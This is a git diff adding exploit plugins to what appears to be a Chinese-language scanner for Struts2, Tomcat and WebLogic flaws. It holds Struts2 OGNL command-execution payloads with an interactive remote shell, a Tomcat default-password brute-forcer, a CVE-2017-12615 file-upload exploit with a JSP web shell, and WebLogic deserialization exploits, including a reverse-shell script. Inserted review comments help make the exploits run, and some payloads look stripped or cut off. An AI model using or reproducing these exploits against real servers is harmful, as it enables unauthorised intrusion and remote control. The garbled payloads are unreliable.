"%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='netstat -an').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\x000" + files ={"test":(uploadexp, "text/plain")} + req = requests.post(self.url, files=files, timeout=6, verify=False) + self.check("struts2-046", req.text) + except Exception as e: + cprint("检测struts2-046超时..", "cyan") + print("超时原因: ", e) + + try: + vulnurl = urlparse(self.url)[0] + "://" + urlparse(self.url)[1] + "/struts2-showcase/integration/saveGangster.action" + postdata = { + "name":self.poc['ST2-048'], + "age":"1", + "__checkbox_bustedBefore":"true", + "description":"1", + } + req = requests.post(vulnurl, data=postdata, headers=headers, timeout=6, verify=False) + self.check("struts2-048", req.text) + except Exception as e: + cprint("检测struts2-048超时..", "cyan") + print("超时原因: ", e) + + try: + req1 = requests.get(self.url+"?class[%27classLoader%27][%27jarPath%27]=1", headers=headers, timeout=6, verify=False) + req2 = requests.get(self.url+"?class[%27classLoader%27][%27resources%27]=1", headers=headers, timeout=6, verify=False) + if req1.status_code == 200 and req2.status_code == 404: + cprint("目标存在struts2-020漏洞..(只提供检测)", "red") + else: + cprint("目标不存在struts2-020漏洞..", "green") + except Exception as e: + cprint("检测struts2-020超时..", "cyan") + 
print("超时原因: ", e) + + try: + req = requests.post(self.url, data=self.poc['ST2-052'], headers=headers_052, timeout=6, verify=False) + if req.status_code == 500 and r"java.security.Provider$Service" in req.text: + cprint("目标存在struts2-052漏洞..(参考metasploit中的struts2_rest_xstream模块)", "red") + else: + cprint("目标不存在struts2-052漏洞..", "green") + except Exception as e: + cprint("检测struts2-052超时..", "cyan") + print("超时原因: ", e) + + try: + param="" + vulnurl = self.url + "?" + param + "=" + self.poc['ST2-053'] + req = requests.get(vulnurl, headers=headers, timeout=6, verify=False) + self.check("struts2-053", req.text) + except Exception as e: + cprint("检测struts2-053超时..", "cyan") + print("超时原因: ", e) + + try: + self.url = self.url.replace("/actionChain1.action", "/${12345%2a54321}/actionChain1.action") + req = requests.get(self.url, timeout=6, verify=False, allow_redirects=True) + if r"670592745" in req.url: + cprint("目标存在struts2-057漏洞..(只提供检测)", "red") + else: + cprint("目标不存在struts2-057漏洞..(只提供检测)", "green") + except Exception as e: + cprint("检测struts2-057超时..", "cyan") + print("超时原因: ", e) + + + def inShell(self, pocname): + cprint('''Code by Lucifer.''', 'cyan') + cprint("-------struts2 交互式shell--------\n目标url:"+self.url, "cyan") + prompt = "shell >>" + + if pocname == "struts2-005": + while True: + print(prompt, end=' ') + command = input() + command = command.strip() + if command != "exit": + try: + commurl = self.url + req = requests.post(commurl, data=self.shell['struts2-005'].replace("FUZZINGCOMMAND", command), headers=headers, timeout=6, verify=False) + print(req.text) + except: + cprint("命令执行失败!!!", "red") + else: + sys.exit(1) + + if pocname == "struts2-009": + while True: + print(prompt, end=' ') + command = input() + command = command.strip() + if command != "exit": + try: + commurl = self.url + req = requests.post(commurl, data=self.shell['struts2-009'].replace("FUZZINGCOMMAND", command), headers=headers, timeout=6, verify=False) + print(req.text) + except: + 
cprint("命令执行失败!!!", "red") + else: + sys.exit(1) + + if pocname == "struts2-013": + while True: + print(prompt, end=' ') + command = input() + command = command.strip() + if command != "exit": + try: + commurl = self.url + req = requests.post(commurl, data=self.shell['struts2-013'].replace("FUZZINGCOMMAND", command), headers=headers, timeout=6, verify=False) + print(req.text) + except: + cprint("命令执行失败!!!", "red") + else: + sys.exit(1) + + if pocname == "struts2-016": + while True: + print(prompt, end=' ') + command = input() + command = command.strip() + if command != "exit": + try: + commurl = self.url + req = requests.post(commurl, data=self.shell['struts2-016'].replace("FUZZINGCOMMAND", command), headers=headers, timeout=6, verify=False) + print(req.text) + except: + cprint("命令执行失败!!!", "red") + else: + sys.exit(1) + + if pocname == "struts2-019": + while True: + print(prompt, end=' ') + command = input() + command = command.strip() + if command != "exit": + try: + command = re.sub(r"\s{2,}", " ", command).replace(" ", "','") + req = requests.post(self.url, data=self.shell['struts2-019'].replace("FUZZINGCOMMAND", command), headers=headers, timeout=6, verify=False) + print(req.text) + except: + cprint("命令执行失败!!!", "red") + else: + sys.exit(1) + + if pocname == "struts2-devmode": + while True: + print(prompt, end=' ') + command = input() + command = command.strip() + if command != "exit": + try: + commurl = self.url+self.shell['struts2-devmode'].replace("FUZZINGCOMMAND", command) + req = requests.get(commurl, headers=headers, timeout=6, verify=False) + print(req.text) + except: + cprint("命令执行失败!!!", "red") + else: + sys.exit(1) + + if pocname == "struts2-032": + while True: + print(prompt, end=' ') + command = input() + command = command.strip() + if command != "exit": + try: + commurl = self.url+self.shell['struts2-032'].replace("FUZZINGCOMMAND", command) + req = requests.get(commurl, headers=headers, timeout=6, verify=False) + print(req.text) + except: + 
cprint("命令执行失败!!!", "red") + else: + sys.exit(1) + + if pocname == "struts2-033": + while True: + print(prompt, end=' ') + command = input() + command = command.strip() + if command != "exit": + try: + commurl = self.url+self.shell['struts2-033'].replace("FUZZINGCOMMAND", command) + req = requests.get(commurl, headers=headers, timeout=6, verify=False) + print(req.text) + except: + cprint("命令执行失败!!!", "red") + else: + sys.exit(1) + + if pocname == "struts2-037": + while True: + print(prompt, end=' ') + command = input() + command = command.strip() + if command != "exit": + try: + commurl = self.url+self.shell['struts2-037'].replace("FUZZINGCOMMAND", command) + req = requests.get(commurl, headers=headers, timeout=6, verify=False) + print(req.text) + except: + cprint("命令执行失败!!!", "red") + else: + sys.exit(1) + + if pocname == "struts2-045": + while True: + print(prompt, end=' ') + command = input() + command = command.strip() + if command != "exit": + headers_exp = { + "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50", + "Accept":"application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*", + "Content-Type":"%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"+command+"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new 
java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}", + } + try: + req = requests.get(self.url, headers=headers_exp, timeout=6, verify=False) + print(req.text) + except: + cprint("命令执行失败!!!", "red") + else: + sys.exit(1) + + if pocname == "struts2-046": + while True: + print(prompt, end=' ') + command = input() + command = command.strip() + if command != "exit": + try: + uploadexp = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"+command+"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\x000" + files ={"test":(uploadexp, "text/plain")} + req = requests.post(self.url, files=files, timeout=6, verify=False) + print(req.text) + except: + cprint("命令执行失败!!!", "red") + else: + sys.exit(1) + + if pocname == "struts2-048": + while True: + print(prompt, end=' ') + command = input() + command = command.strip() + if command != "exit": + try: + vulnurl = urlparse(self.url)[0] + "://" + urlparse(self.url)[1] + "/struts2-showcase/integration/saveGangster.action" + postdata = { + "name":self.shell['struts2-048'].replace("FUZZINGCOMMAND", command), + "age":"1", + 
"__checkbox_bustedBefore":"true", + "description":"1", + } + req = requests.post(vulnurl, data=postdata, headers=headers, timeout=6, verify=False) + print(req.text) + except: + cprint("命令执行失败!!!", "red") + else: + sys.exit(1) + + if pocname == "struts2-053": + param = input("请指定struts2-053参数: ") + while True: + print(prompt, end=' ') + command = input() + command = command.strip() + if command != "exit": + try: + vulnurl = self.url + "?" + param + "=" + self.shell['struts2-053'].replace("FUZZINGCOMMAND", command) + req = requests.get(vulnurl, headers=headers, timeout=6, verify=False) + pattern = r'81dc9bdb52d04dc2([\s\S]*)0036dbd8313ed055' + m = re.search(pattern,req.text) + if m: + print(m.group(1).strip()) + print("\n") + except: + cprint("命令执行失败!!!", "red") + else: + sys.exit(1) + +if __name__ == "__main__": + filecontent = open("success.txt", "a+") + try: + if sys.argv[1] == "-f": + with open(sys.argv[2]) as f: + for line in f.readlines(): + line = line.strip() + strutsVuln = struts_baseverify(line) + strutsVuln.scan() + elif sys.argv[1] == "-u" and sys.argv[3] == "-i": + strutsVuln = struts_baseverify(sys.argv[2].strip()) + strutsVuln.inShell(sys.argv[4].strip()) + else: + strutsVuln = struts_baseverify(sys.argv[1].strip()) + strutsVuln.scan() + except Exception as e: + figlet = '''Code by Lucifer.''' + cprint(figlet,'cyan') + print("Usage: python struts-scan.py http://example.com/index.action 检测") + print(" python struts-scan.py -u http://example.com/index.action -i struts2-045 进入指定漏洞交互式shell") + print(" python struts-scan.py -f url.txt 批量检测") + +def struts2_special_plugin_(arg,config): + print(arg.url) + struts_baseverify(arg.url).scan() diff --git a/plugins/test.py b/plugins/test.py deleted file mode 100644 index 9e5f5f8..0000000 --- a/plugins/test.py +++ /dev/null @@ -1,7 +0,0 @@ - - - - - - - diff --git a/plugins/tomcat_plugin.py b/plugins/tomcat_plugin.py new file mode 100644 index 0000000..8c170ee --- /dev/null +++ b/plugins/tomcat_plugin.py 
@@ -0,0 +1,15 @@
+#coding=utf-8
+pocs=[
+ {"requests_option":"",
+ "url":["/manager/html/upload"],
+ "params":[],
+ "data":[],
+ "flag":[],
+ "success":"",
+ "fail":"",
+ "end":"",
+ "admin_bursk":"",
+ "username":[],
+ "password":[],
+ },
+]
\ No newline at end of file
diff --git a/plugins/tomcat_special_plugin_.py b/plugins/tomcat_special_plugin_.py
new file mode 100644
index 0000000..3b79907
--- /dev/null
+++ b/plugins/tomcat_special_plugin_.py
@@ -0,0 +1,84 @@ +#coding=utf-8 +import urllib.request, urllib.error, urllib.parse +import base64 +import requests +import uuid +from termcolor import cprint +from urllib.parse import urlparse +from concurrent.futures import ThreadPoolExecutor +def requests_post(url,username,password,flag_list): + try: + login_url = url + '/manager/html' + auth_str_temp = user + ':' + password + auth_str_temp = bytes(auth_str_temp, encoding="utf8") + auth_str = base64.b64encode(auth_str_temp) + auth_str = str(auth_str, encoding="utf8") + headers = {'Authorization': 'Basic ' + auth_str} + res = requests.post(url=login_url, headers=headers, timeout=config.Timeout) + success_num=0 + for flag in flag_list: + if flag in res_html: + success_num=success_num+1 + info = '%s Tomcat Weak password %s:%s' % (login_url, user, password) + if success_num>0: + print(info) + except Exception: + pass +def crack_password(arg,config): + url = "http://%s"%(arg.url) + print("对tomcat weak password 进行检测") + flag_list=['Application Manager','Welcome'] + user_list=['admin','manager','tomcat','apache','root'] + pass_list=['','123456','12345678','123456789','admin123','123123','admin888','password','admin1','administrator','8888888','123123','admin','manager','tomcat','apache','root'] + with ThreadPoolExecutor(config.ThreadNum) as excetor: + for user in user_list: + for password in pass_list: + try: + excetor.submit(requests_post(arg.url, user, password, flag_list)) + except Exception: + pass + + +''' +http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0107097.html +https://mp.weixin.qq.com/s?__biz=MzI1NDg4MTIxMw==&mid=2247483659&idx=1&sn=c23b3a3b3b43d70999bdbe644e79f7e5 +https://mp.weixin.qq.com/s?__biz=MzU3ODAyMjg4OQ==&mid=2247483805&idx=1&sn=503a3e29165d57d3c20ced671761bb5e +''' +#脚本来自:https://github.com/SkewwG/VulScan/blob/master/tomcat/cve-12615.py +class Exploit: + def attack(self, url): + uu = uuid.uuid4() + headers = { + 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:56.0) Gecko/20100101 
Firefox/56.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3', + 'Connection': 'close', + 'Upgrade-Insecure-Requests': '1', + } + + # body = '''<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp + # +"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("ske".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("
"+excuteCmd(request.getParameter("cmd"))+"
");}else{out.println(":-)");}%>''' + body = '''<%out.print("test");%>''' + url_parse = urlparse(url) + url = r'http://' + url if url_parse.scheme == '' else url + put_url = r'{}/{}.jsp/'.format(url,uu) + try: + res = requests.put(put_url,data=body,headers=headers) + code = res.status_code + if code == 201: + print('[+]access : {}'.format(put_url[:-1])) + access_url = put_url[:-1] + whoami = requests.get(access_url).text + if r"test" in whoami: + print("[+]存在Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)漏洞...(高危)\tpayload: " + access_url) + else: + print("[+]不存在Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)漏洞...(高危)") + else: + return None + except Exception as e: + cprint("[-] " + __file__ + "====>连接超时", "cyan") + +def tomcat_special_plugin_(arg,config): + Exploit().attack(arg.url) + crack_password(arg,config) + diff --git a/plugins/user_agent.py b/plugins/user_agent.py index bfb87b9..3888e2c 100644 --- a/plugins/user_agent.py +++ b/plugins/user_agent.py @@ -232,6 +232,6 @@ def get_user_agent(): 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.19 (KHTML, like Gecko) Ubuntu/11.10 Chromium/18.0.1025.142 Chrome/18.0.1025.142 Safari/535.19', 'Mozilla/5.0 (Windows NT 5.1; U; de; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 11.00' ] - return random.choice(user_agents) + return {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Connection": "keep-alive","User-Agent":random.choice(user_agents)} diff --git a/plugins/weblogic_exp/CVE_2017_10271_linux.py b/plugins/weblogic_exp/CVE_2017_10271_linux.py new file mode 100644 index 0000000..65d37dc --- /dev/null +++ b/plugins/weblogic_exp/CVE_2017_10271_linux.py 
@@ -0,0 +1,150 @@ +#!/usr/bin/env python +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ + +''' +import requests +import argparse +import time +import base64 +proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'} +headers = {'User-Agent':'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)'} +timeout = 5 +''' +payload的格式化 +''' +def payload_command(command_in,output_file,os): + html_escape_table = { + "&": "&", + '"': """, + "'": "'", + ">": ">", + "<": "<", + } + #命令执行回显:将命令执行的结果输出到文件中 + #command_in_payload = 'find . -name index.html| while read path_file;do {} >$(dirname $path_file)/{};done'.format(command_in,output_file) + command_in_payload = '{} > ./servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/{}'.format(command_in,output_file) + command_filtered = ""+"".join(html_escape_table.get(c, c) for c in command_in_payload)+"" + #XMLDecoder反序列化payload: + cmd_app = '/bin/sh' if os == 'linux' else 'cmd.exe' + cmd_param = '-c' if os == 'linux' else '/c' + + payload_1 = " \n" \ + " " \ + " \n" \ + " \n" \ + " \n" \ + " " \ + " " \ + " {} " \ + " " \ + " " \ + " {} " \ + " " \ + " ".format(cmd_app,cmd_param) \ + + command_filtered + \ + " " \ + " " \ + " " \ + " " \ + " " \ + " " \ + " " \ + " " \ + "" + return payload_1 + +''' +得到命令执行的回显结果 +''' +def get_output(target,output_file): + if not target.startswith('http'): + target = 'http://{}'.format(target) + #url增加时间戳避免数据是上一次的结果缓存 + output_url = '{}/bea_wls_internal/{}?{}'.format(target,output_file,int(time.time())) + try: + r = requests.get(output_url,headers = headers,proxies=proxies,timeout=timeout,verify=False) + if r.status_code == requests.codes.ok: + return (True,(r.text.strip())) + elif r.status_code == 404: + return (False,'404 no output') + else: + return 
(False,r.status_code) + except Exception,ex: + #raise + return (False,str(ex)) + +''' +RCE +''' +def weblogic_rce(target,cmd,output_file,os='linux'): + if not target.startswith('http'): + target = 'http://{}'.format(target) + url = '{}/wls-wsat/CoordinatorPortType'.format(target) + #content-type必须为text/xml + payload_header = {'content-type': 'text/xml','User-Agent':'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)'} + msg = '' + try: + r = requests.post(url, payload_command(cmd,output_file,os),headers = payload_header,verify=False,timeout=timeout,proxies=proxies) + #500时说明已成功反序列化执行命令 + if r.status_code == 500: + #delay一下,保证命令执行完整性: + time.sleep(1) + return get_output(target,output_file) + elif r.status_code == 404: + return (False,'404 no vulnerability') + else: + return (False,'{} something went wrong'.format(r.status_code)) + except requests.exceptions.ReadTimeout: + return (False,'timeout') + except Exception,ex: + #raise + return (False,str(ex)) + +''' +getshell +''' +def weblogic_getshell(target,output_file,shell_file,os='linux'): + if not target.startswith('http'): + target = 'http://{}'.format(target) + with open(shell_file) as f: + cmd = 'echo {}|base64 -d'.format(base64.b64encode(f.read())) + status,result = weblogic_rce(target,cmd,output_file,os) + if status: + print '[+]shell-> {}/bea_wls_internal/{}'.format(target,output_file) + return (status,result) +''' +main +''' +def main(): + global proxies + + parse = argparse.ArgumentParser() + parse.add_argument('-t', '--target',required=True, help='weblogic ip and port(eg -> 172.16.80.131:7001 or https://172.16.80.131)') + parse.add_argument('-c', '--cmd', required=False,default='id', help='command to execute,default is "id"') + parse.add_argument('-o', '--output', required=False,default='output.txt', help='output file name,default is output.txt') + parse.add_argument('-s', '--shell', required = False,default='',help='local jsp file name to upload,and set -o xxx.jsp') + 
parse.add_argument('--os',choices=['linux','win'],default='linux',help='host os:linux or win,default is linux') + parse.add_argument('--proxy', action = 'store_true',default=False,help='use proxy') + args = parse.parse_args() + + #是否使用proxy + if not args.proxy: + proxies = None + if args.shell!='': + status,result = weblogic_getshell(args.target,args.output,args.shell,args.os) + else: + status,result = weblogic_rce(args.target,args.cmd,args.output,args.os) + #output result: + if status: + print result + else: + print '[-]FAIL:{}'.format(result) + +if __name__ == '__main__': + main() diff --git a/plugins/weblogic_exp/CVE_2017_10271_win.py b/plugins/weblogic_exp/CVE_2017_10271_win.py new file mode 100644 index 0000000..6c3b6b2 --- /dev/null +++ b/plugins/weblogic_exp/CVE_2017_10271_win.py 
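Review bot: This file is Python 2 only (`except Exception,ex:` in `get_output` and `weblogic_rce`, `print result` and `print '[+]shell-> ...'` in `weblogic_getshell` and `main`), while the rest of this tree is Python 3.7 (`print(...)`, `input()`, `bytes(..., encoding=)`, `cpython-37.pyc` caches), so importing it from the plugin tree raises SyntaxError before any scan runs. The fixes are mechanical: `except Exception as ex:`, `print(result)`, `print('[-]FAIL:{}'.format(result))`, and in `weblogic_getshell` open the shell file with `'rb'` and use `base64.b64encode(f.read()).decode()` since `b64encode` takes bytes on 3.x. Also, `payload_command` appears in this rendering with its XML tags and the `html_escape_table` entities stripped (`"&": "&"`, a body made of blank strings); if the committed file really looks like this, the request carries no `<java>` payload and the "500 means vulnerable" check in `weblogic_rce` is meaningless, so please confirm the file content. The hard-coded `9j4dqk` war directory is deployment-specific and deserves a comment saying the output path must match the target's `bea_wls_internal` deployment, otherwise `get_output` will always report `404 no output` even when the command ran.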
@@ -0,0 +1,121 @@ +#!/usr/bin/env python +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ + +''' +import requests +import argparse +import time +import base64 + +proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'} +headers = {'User-Agent':'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)'} +timeout = 5 +''' +payload的格式化 +''' +def payload_command(shell_file,output_file): + html_escape_table = { + "&": "&", + '"': """, + "'": "'", + ">": ">", + "<": "<", + } + with open(shell_file) as f: + shell_context = f.read() + command_filtered = ""+"".join(html_escape_table.get(c, c) for c in shell_context)+"" + payload_1 = ''' + + + + + + servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/{} + {} + + + + + '''.format(output_file,command_filtered) + return payload_1 + +''' +命令执行 +''' +def execute_cmd(target,output_file,command): + if not target.startswith('http'): + target = 'http://{}'.format(target) + #url增加时间戳避免数据是上一次的结果缓存 + output_url = '{}/bea_wls_internal/{}?{}'.format(target,output_file,int(time.time())) + data = {'c':command} + try: + r = requests.post(output_url,data=data,headers = headers,proxies=proxies,timeout=timeout) + if r.status_code == requests.codes.ok: + return (True,r.text.strip()) + elif r.status_code == 404: + return (False,'404 no output') + else: + return (False,r.status_code) + except requests.exceptions.ReadTimeout: + return (False,'timeout') + except Exception,ex: + #raise + return (False,str(ex)) + +''' +RCE:上传命令执行的shell文件 +''' +def weblogic_rce(target,cmd,output_file,shell_file): + if not target.startswith('http'): + target = 'http://{}'.format(target) + url = '{}/wls-wsat/CoordinatorPortType'.format(target) + #content-type必须为text/xml + payload_header = {'content-type': 
'text/xml','User-Agent':'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)'} + msg = '' + try: + r = requests.post(url, payload_command(shell_file,output_file),headers = payload_header,verify=False,timeout=timeout,proxies=proxies) + #500时说明已成功反序列化执行命令 + if r.status_code == 500: + return execute_cmd(target,output_file,cmd) + elif r.status_code == 404: + return (False,'404 no vulnerability') + else: + return (False,'{} something went wrong'.format(r.status_code)) + except requests.exceptions.ReadTimeout: + return (False,'timeout') + except Exception,ex: + #raise + return (False,str(ex)) + +''' +main +''' +def main(): + global proxies + + parse = argparse.ArgumentParser() + parse.add_argument('-t', '--target',required=True, help='weblogic ip and port(eg -> 172.16.80.131:7001 or https://172.16.80.131)') + parse.add_argument('-c', '--cmd', required=False,default='whoami', help='command to execute,default is "whoami"') + parse.add_argument('-o', '--output', required=False,default='output.jsp', help='output file name,default is output.jsp') + parse.add_argument('-s', '--shell', required = False,default='exec.jsp',help='local jsp file name to upload') + parse.add_argument('--proxy', action = 'store_true',default=False,help='use proxy') + args = parse.parse_args() + + #是否使用proxy + if not args.proxy: + proxies = None + status,result = weblogic_rce(args.target,args.cmd,args.output,args.shell) + #output result: + if status: + print result + else: + print '[-]FAIL:{}'.format(result) + +if __name__ == '__main__': + main() diff --git a/plugins/weblogic_exp/CVE_2018_2893.py b/plugins/weblogic_exp/CVE_2018_2893.py new file mode 100644 index 0000000..cb5ea42 --- /dev/null +++ b/plugins/weblogic_exp/CVE_2018_2893.py 
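Review bot: Same Python 2 syntax problem as the Linux variant — `except Exception,ex:` in `execute_cmd` and `weblogic_rce`, `print result` / `print '[-]FAIL:...'` in `main` — so this module cannot be imported under the 3.7 interpreter the rest of the repository targets; `except Exception as ex:` and `print(result)` fix it. In `execute_cmd` the follow-up `requests.post(output_url, ...)` omits `verify=False` although the `weblogic_rce` post sets it, so an https target with a self-signed certificate gets the payload delivered but the command-output fetch then fails with an SSL error; add `verify=False` there for consistency. Note also that this writes the contents of `exec.jsp` to a world-reachable path (`/bea_wls_internal/output.jsp` by default) and nothing removes it; if `exec.jsp` does not gate the `c` parameter behind a secret, the scan leaves an unauthenticated command shell on the target, which should at least be stated in the `--shell` help text. The `html_escape_table` and the `<java>` body in `payload_command` look stripped of tags and entities in this rendering, so the committed bytes are worth verifying.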
@@ -0,0 +1,73 @@ +#!/usr/bin/env python +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ + +''' +import socket +import os +import sys +import struct +''' +可以直接反弹shell +监听 + nc -lvvp reverse_port +发送payload + python weblogic.py target_host target_port reverse_host reverse_port +''' + +if len(sys.argv) < 4: + print 'Usage: python %s ' % os.path.basename(sys.argv[0]) + sys.exit() + +sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +sock.settimeout(5) + +host = sys.argv[1] +port = int(sys.argv[2]) + +server_address = (host, port) +print '[+] Connecting to %s port %s' % server_address +sock.connect(server_address) + + +reverse_host = sys.argv[3] +reverse_port = int(sys.argv[4]) +# Send headers +headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n' +print 'sending "%s"' % headers +sock.sendall(headers) + +data = sock.recv(1024) +print >>sys.stderr, 'received "%s"' % data + + +def padhex(s): + s = s.strip('0x') + if len(s) %2 !=0: + return '0'+s + else: + return s + +host_hex = padhex(hex(len(reverse_host))+reverse_host.encode('hex')) +port_hex = padhex(hex(reverse_port)) + + +payloadObj = """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%s737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b02000078700000%s7571007e00210000000271007e002b76720003696e7400000000000000000000007870737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000077080000001000000000787878"""%(host_hex,port_hex) + + 
+payload='\x00\x00\x09\xf3\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\